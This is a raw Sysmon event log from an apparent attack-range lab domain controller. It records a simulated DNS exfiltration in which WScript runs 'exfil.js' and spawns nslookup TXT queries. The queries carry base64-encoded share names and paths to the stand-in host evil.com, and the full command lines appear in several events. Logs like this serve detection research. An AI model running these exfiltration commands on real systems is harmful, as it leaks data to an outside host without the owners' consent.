14:21:39.965{2E1864BB-18F3-629A-C544-000000005F02}40043004C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-C744-000000005F02}5692C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211753Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.965{2E1864BB-18F3-629A-C744-000000005F02}5692C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-C544-000000005F02}4004C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgtunm.tmp 2>&1 10341000x8000000000000000211752Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.934{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-C644-000000005F02}3568C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.934{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-C644-000000005F02}3568C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.934{2E1864BB-18F3-629A-C644-000000005F02}35684280C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-C544-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.919{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C644-000000005F02}3568C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.903{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.903{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.903{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.903{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.903{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C544-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.903{2E1864BB-18E0-629A-6742-000000005F02}39762404C:\Windows\System32\WScript.exe{2E1864BB-18F3-629A-C544-000000005F02}4004C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.908{2E1864BB-18F3-629A-C544-000000005F02}4004C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgtunm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000211741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.903{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlbhmpsa.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000211740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.791{00000000-0000-0000-0000-000000000000}6160evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.488{00000000-0000-0000-0000-000000000000}6652evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.406{00000000-0000-0000-0000-000000000000}3300evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.258{00000000-0000-0000-0000-000000000000}2932evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211736Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.156{00000000-0000-0000-0000-000000000000}8012evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211735Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:38.060{00000000-0000-0000-0000-000000000000}6372evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211734Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.936{00000000-0000-0000-0000-000000000000}5836evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211733Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.830{00000000-0000-0000-0000-000000000000}4284evil.com0::ffff:127.0.0.1;<unknown process> 22542200x8000000000000000211732Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:37.725{00000000-0000-0000-0000-000000000000}2812evil.com0::ffff:127.0.0.1;<unknown process> 10341000x8000000000000000211731Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.848{2E1864BB-18F3-629A-C344-000000005F02}40605748C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-C444-000000005F02}3452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211730Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.848{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211729Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.848{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211728Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.848{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C444-000000005F02}3452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211727Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.848{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211726Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.848{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211725Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.848{2E1864BB-18F3-629A-C244-000000005F02}66045440C:\Windows\system32\cmd.exe{2E1864BB-18F3-629A-C444-000000005F02}3452C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000211724Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.852{2E1864BB-18F3-629A-C444-000000005F02}3452C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18F3-629A-C244-000000005F02}6604C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlbhmpsa.tmp 2>&1 10341000x8000000000000000211723Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.832{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-C344-000000005F02}4060C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211722Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.832{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18F3-629A-C344-000000005F02}4060C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211721Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.816{2E1864BB-18F3-629A-C344-000000005F02}40605748C:\Windows\system32\conhost.exe{2E1864BB-18F3-629A-C244-000000005F02}6604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211720Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.801{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18F3-629A-C344-000000005F02}4060C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000211719Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.785{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211718Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.785{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211717Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:39.785{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211716Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 